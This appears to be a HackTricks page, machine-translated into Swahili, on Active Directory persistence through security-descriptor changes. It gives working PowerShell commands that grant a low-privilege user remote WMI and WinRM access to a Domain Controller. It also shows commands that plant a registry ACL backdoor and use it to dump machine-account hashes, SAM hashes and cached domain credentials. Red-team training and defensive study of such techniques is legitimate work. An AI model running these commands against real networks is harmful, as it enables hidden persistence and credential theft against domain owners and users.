5.1 KiB
Security Descriptors
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Security Descriptors
From the docs: Lugha ya Mwelekeo wa Maelezo ya Usalama (SDDL) inaelezea muundo unaotumika kuelezea mwelekeo wa usalama. SDDL inatumia nyuzi za ACE kwa DACL na SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
Mwelekeo wa usalama hutumika kuhifadhi idhini ambazo kitu kina juu ya kitu. Ikiwa unaweza tu kufanya mabadiliko madogo katika mwelekeo wa usalama wa kitu, unaweza kupata ruhusa za kuvutia sana juu ya hicho kitu bila kuhitaji kuwa mwanachama wa kundi lenye mamlaka.
Hivyo, mbinu hii ya kudumu inategemea uwezo wa kushinda kila ruhusa inayohitajika dhidi ya vitu fulani, ili uweze kutekeleza kazi ambayo kawaida inahitaji ruhusa za admin lakini bila kuhitaji kuwa admin.
Access to WMI
Unaweza kumpa mtumiaji ruhusa ya kutekeleza WMI kwa mbali ukitumia hii:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Access to WinRM
Patia winrm PS console kwa mtumiaji ukitumia hii:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
Remote access to hashes
Fikia registry na dump hashes ukitengeneza Reg backdoor using DAMP, ili uweze wakati wowote kupata hash ya kompyuta, SAM na yoyote cached AD credential katika kompyuta. Hivyo, ni muhimu sana kutoa ruhusa hii kwa mtumiaji wa kawaida dhidi ya kompyuta ya Domain Controller:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Angalia Silver Tickets kujifunza jinsi unavyoweza kutumia hash ya akaunti ya kompyuta ya Domain Controller.
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.